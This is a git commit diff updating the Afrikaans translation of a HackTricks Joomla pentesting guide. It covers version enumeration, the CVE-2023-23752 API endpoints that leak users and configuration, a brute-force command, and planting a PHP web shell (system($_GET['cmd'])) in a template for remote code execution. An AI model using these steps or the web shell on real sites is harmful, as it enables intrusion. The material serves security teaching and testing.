mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-22 12:43:23 +00:00
Translated ['network-services-pentesting/pentesting-web/joomla.md'] to a
This commit is contained in:
parent
5bb397a217
commit
63b8797f78
1 changed files with 25 additions and 96 deletions
|
@ -2,19 +2,19 @@
|
|||
|
||||
<details>
|
||||
|
||||
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>Leer AWS-hacking vanaf nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
* Werk jy in 'n **cybersecurity-maatskappy**? Wil jy jou **maatskappy geadverteer sien in HackTricks**? Of wil jy toegang hê tot die **nuutste weergawe van die PEASS of laai HackTricks in PDF af**? Kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFT's**](https://opensea.io/collection/the-peass-family)
|
||||
* Werk jy by 'n **cybersekuriteitsmaatskappy**? Wil jy jou **maatskappy geadverteer sien in HackTricks**? of wil jy toegang hê tot die **nuutste weergawe van die PEASS of HackTricks aflaai in PDF-formaat**? Kyk na die [**INSKRYWINGSPLANNE**](https://github.com/sponsors/carlospolop)!
|
||||
* Ontdek [**Die PEASS-familie**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFT's**](https://opensea.io/collection/the-peass-family)
|
||||
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* **Sluit aan by die** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** my op **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Deel jou hacking-truuks deur PR's in te dien by die [hacktricks repo](https://github.com/carlospolop/hacktricks) en [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
|
||||
* **Deel jou haktruuks deur PR's in te dien by die [hacktricks-opslagplek](https://github.com/carlospolop/hacktricks) en [hacktricks-cloud-opslagplek](https://github.com/carlospolop/hacktricks-cloud)**.
|
||||
|
||||
</details>
|
||||
|
||||
### Joomla Statistieke
|
||||
### Joomla Statistiek
|
||||
|
||||
Joomla versamel sekere anonieme [gebruiksstatistieke](https://developer.joomla.org/about/stats.html) soos die uiteensetting van Joomla, PHP en databasisweergawes en bedienersisteem in gebruik op Joomla-installasies. Hierdie data kan ondervra word deur middel van hul openbare [API](https://developer.joomla.org/about/stats/api.html).
|
||||
Joomla versamel sekere anonieme [gebruikstatistieke](https://developer.joomla.org/about/stats.html) soos die uiteensetting van Joomla, PHP en databasisweergawes en bedienersisteme wat op Joomla-installasies gebruik word. Hierdie data kan ondervra word via hul openbare [API](https://developer.joomla.org/about/stats/api.html).
|
||||
```bash
|
||||
curl -s https://developer.joomla.org/stats/cms_version | python3 -m json.tool
|
||||
|
||||
|
@ -42,9 +42,9 @@ curl -s https://developer.joomla.org/stats/cms_version | python3 -m json.tool
|
|||
}
|
||||
}
|
||||
```
|
||||
## Enumerasie
|
||||
## Opsomming
|
||||
|
||||
### Ontdekking/Voetspore
|
||||
### Ontdekking/Voetspoor
|
||||
|
||||
* Kontroleer die **meta**
|
||||
```bash
|
||||
|
@ -52,33 +52,7 @@ curl https://www.joomla.org/ | grep Joomla | grep generator
|
|||
|
||||
<meta name="generator" content="Joomla! - Open Source Content Management" />
|
||||
```
|
||||
# robots.txt
|
||||
|
||||
Die `robots.txt`-lêer is 'n tekstêr wat deur webwerwe gebruik word om aan soekenjins te vertel watter dele van die webwerf nie geïndekseer moet word nie. Dit is 'n belangrike hulpmiddel vir webwerf-eienaars om beheer oor die sienbaarheid van hul inhoud in soekenjins te hê.
|
||||
|
||||
Die `robots.txt`-lêer is 'n eenvoudige tekslêer wat in die hoofgids van 'n webwerf geplaas word. Dit bevat instruksies vir soekenjins oor watter gedeeltes van die webwerf geïndekseer mag word en watter gedeeltes nie. Dit is belangrik om te verstaan dat die `robots.txt`-lêer slegs 'n aanbeveling is en dat soekenjins nie verplig is om dit te volg nie.
|
||||
|
||||
Die sintaksis van die `robots.txt`-lêer is eenvoudig. Dit bestaan uit 'n reeks van regels wat elkeen 'n spesifieke instruksie bevat. Die mees algemene instruksies is `User-agent` en `Disallow`. Die `User-agent`-instruksie identifiseer die soekenjinbot wat die instruksies moet volg, terwyl die `Disallow`-instruksie spesifiseer watter gedeeltes van die webwerf nie geïndekseer mag word nie.
|
||||
|
||||
Byvoorbeeld, as jy wil hê dat alle soekenjins jou hele webwerf moet ignoreer, kan jy die volgende reël in jou `robots.txt`-lêer insluit:
|
||||
|
||||
```
|
||||
User-agent: *
|
||||
Disallow: /
|
||||
```
|
||||
|
||||
Hierdie instruksie sal aan alle soekenjins sê om nie enige gedeelte van jou webwerf te indekseer nie. Dit is egter belangrik om versigtig te wees met die gebruik van die `Disallow`-instruksie, aangesien dit ook kan verhoed dat legitieme soekenjins toegang tot belangrike inhoud op jou webwerf verkry.
|
||||
|
||||
Dit is ook moontlik om spesifieke gedeeltes van jou webwerf uit te sluit van indeksering. Byvoorbeeld, as jy wil hê dat 'n spesifieke gids op jou webwerf nie geïndekseer moet word nie, kan jy die volgende reël in jou `robots.txt`-lêer insluit:
|
||||
|
||||
```
|
||||
User-agent: *
|
||||
Disallow: /gids/
|
||||
```
|
||||
|
||||
Hierdie instruksie sal aan alle soekenjins sê om die `/gids/`-gids uit te sluit van indeksering. Dit beteken dat die inhoud van hierdie gids nie in soekenjins sal verskyn nie.
|
||||
|
||||
Dit is belangrik om die `robots.txt`-lêer korrek te konfigureer en gereeld te hersien om te verseker dat dit die gewenste resultate lewer. Foute in die `robots.txt`-lêer kan lei tot onbedoelde gevolge, soos die uitsluiting van belangrike inhoud uit soekenjins.
|
||||
* robots.txt
|
||||
```
|
||||
# If the Joomla site is installed within a folder
|
||||
# eg www.example.com/joomla/ then the robots.txt file
|
||||
|
@ -88,48 +62,7 @@ Dit is belangrik om die `robots.txt`-lêer korrek te konfigureer en gereeld te h
|
|||
# paths.
|
||||
[...]
|
||||
```
|
||||
# README.txt
|
||||
|
||||
Hierdie lêer bevat inligting oor die pentesting van Joomla-webwerwe. Dit bevat 'n lys van hulpmiddels en tegnieke wat gebruik kan word om die veiligheid van 'n Joomla-webwerf te toets en te beproef.
|
||||
|
||||
## Inhoud
|
||||
|
||||
1. **Joomla Pentesting-gids**
|
||||
- Inleiding tot Joomla-pentesting
|
||||
- Identifisering van Joomla-weergawes
|
||||
- Joomla-weergawe-uitbuiting
|
||||
- Joomla-gebruikersinligting oopmaak
|
||||
- Joomla-databasisinligting oopmaak
|
||||
- Joomla-tema- en uitbreidingsinligting oopmaak
|
||||
- Joomla-beveiligingsmaatreëls
|
||||
- Aanbevelings vir die versterking van Joomla-webwerwe
|
||||
|
||||
2. **Hulpmiddels vir Joomla Pentesting**
|
||||
- Joomla-scanners
|
||||
- Joomla-uitbuitingshulpmiddels
|
||||
- Joomla-databasisverkenner
|
||||
- Joomla-wagwoordkraker
|
||||
- Joomla-tema- en uitbreidingsontleder
|
||||
- Joomla-veiligheidstoetshulpmiddels
|
||||
|
||||
3. **Aanvullende bronne**
|
||||
- Nuttige webwerwe en blogs
|
||||
- Boeke en artikels oor Joomla-pentesting
|
||||
- Aanlyngemeenskappe en forums
|
||||
|
||||
## Bydraes
|
||||
|
||||
As jy enige bydraes of voorstelle het om hierdie gids te verbeter, voel asseblief vry om 'n bydrae te maak deur 'n trekversoek in te dien. Ons waardeer enige bydrae wat kan help om hierdie gids meer volledig en nuttig te maak.
|
||||
|
||||
## Lisensie
|
||||
|
||||
Hierdie gids is gelisensieer onder die [MIT-lisensie](https://opensource.org/licenses/MIT). Jy is vry om die inhoud te gebruik, te wysig en te versprei volgens die voorwaardes van hierdie lisensie.
|
||||
|
||||
## Skakels
|
||||
|
||||
- [HackTricks](https://book.hacktricks.xyz/)
|
||||
- [Joomla](https://www.joomla.org/)
|
||||
- [Joomla Security Centre](https://developer.joomla.org/security-centre.html)
|
||||
* README.txt
|
||||
```
|
||||
1- What is this?
|
||||
* This is a Joomla! installation/upgrade package to version 3.x
|
||||
|
@ -142,16 +75,24 @@ Hierdie gids is gelisensieer onder die [MIT-lisensie](https://opensource.org/lic
|
|||
* In **/administrator/manifests/files/joomla.xml** kan jy die weergawe sien.
|
||||
* In **/language/en-GB/en-GB.xml** kan jy die weergawe van Joomla kry.
|
||||
* In **plugins/system/cache/cache.xml** kan jy 'n benaderende weergawe sien.
|
||||
|
||||
### Outomaties
|
||||
```bash
|
||||
droopescan scan joomla --url http://joomla-site.local/
|
||||
```
|
||||
In[ **80,443 - Pentesting Web Metodologie is 'n afdeling oor CMS-skanners**](./#cms-skanners) wat Joomla kan skandeer.
|
||||
In [**80,443 - Pentesting Web Metodologie** is 'n afdeling oor CMS-skandeerders](./#cms-skanners) wat Joomla kan skandeer.
|
||||
|
||||
|
||||
### API Ongeagte Geen-gemagtigde Inligting Uitlek:
|
||||
Weergawes vanaf 4.0.0 tot 4.2.7 is vatbaar vir Ongeagte inligting uitlek (CVE-2023-23752) wat kredite en ander inligting sal dump.
|
||||
|
||||
* Gebruikers: `http://<host>/api/v1/users?public=true`
|
||||
|
||||
* Konfigurasie-lêer: `http://<host>/api/index.php/v1/config/application?public=true`
|
||||
|
||||
**MSF Module**: `scanner/http/joomla_api_improper_access_checks` of ruby-skrip: [51334](https://www.exploit-db.com/exploits/51334)
|
||||
|
||||
### Brute-Force
|
||||
|
||||
Jy kan hierdie [skripsie](https://github.com/ajnik/joomla-bruteforce) gebruik om die aanmelding met geweld te probeer.
|
||||
Jy kan hierdie [skrip](https://github.com/ajnik/joomla-bruteforce) gebruik om die aanmelding met geweld te probeer.
|
||||
```shell-session
|
||||
sudo python3 joomla-brute.py -u http://joomla-site.local/ -w /usr/share/metasploit-framework/data/wordlists/http_default_pass.txt -usr admin
|
||||
|
||||
|
@ -159,23 +100,11 @@ admin:admin
|
|||
```
|
||||
## RCE
|
||||
|
||||
As jy daarin slaag om **admin-legitimasie** te kry, kan jy **RCE binne-in dit** kry deur 'n stukkie **PHP-kode** by te voeg om **RCE** te verkry. Ons kan dit doen deur 'n **sjabloon** aan te pas.
|
||||
As jy daarin slaag om **admin-kredensiale** te kry, kan jy **RCE binne-in dit** kry deur 'n snipper van **PHP-kode** by te voeg om **RCE** te verkry. Ons kan dit doen deur 'n **sjabloon aan te pas**.
|
||||
|
||||
1. **Klik** op **`Templates`** aan die onderkant links onder `Configuration` om die sjabloonmenu op te roep.
|
||||
2. **Klik** op 'n **sjabloonnaam**. Laat ons **`protostar`** onder die `Template`-kolomkop kies. Dit sal ons na die **`Templates: Customise`**-bladsy bring.
|
||||
3. Uiteindelik kan jy op 'n bladsy klik om die **bladsybron** op te roep. Laat ons die **`error.php`**-bladsy kies. Ons sal 'n **PHP-eenreëler byvoeg om kode-uitvoering te verkry** soos volg:
|
||||
2. **Klik** op 'n **sjabloonnaam**. Laat ons **`protostar`** kies onder die `Template` kolomkop. Dit sal ons na die **`Templates: Customise`** bladsy bring.
|
||||
3. Laastens kan jy op 'n bladsy klik om die **bladsybron** op te roep. Laat ons die **`error.php`** bladsy kies. Ons sal 'n **PHP een-liner byvoeg om kode-uitvoering te verkry** soos volg:
|
||||
1. **`system($_GET['cmd']);`**
|
||||
4. **Save & Close**
|
||||
5. `curl -s http://joomla-site.local/templates/protostar/error.php?cmd=id`
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
* Werk jy in 'n **cybersekuriteitsmaatskappy**? Wil jy jou **maatskappy geadverteer sien in HackTricks**? Of wil jy toegang hê tot die **nuutste weergawe van die PEASS of HackTricks aflaai in PDF-formaat**? Kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* Kry die [**amptelike PEASS & HackTricks-uitrusting**](https://peass.creator-spring.com)
|
||||
* **Sluit aan by die** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** my op **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Deel jou haktruuks deur PR's in te dien by die [hacktricks repo](https://github.com/carlospolop/hacktricks) en [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
|
||||
|
||||
</details>
|
||||
|
|
Loading…
Reference in a new issue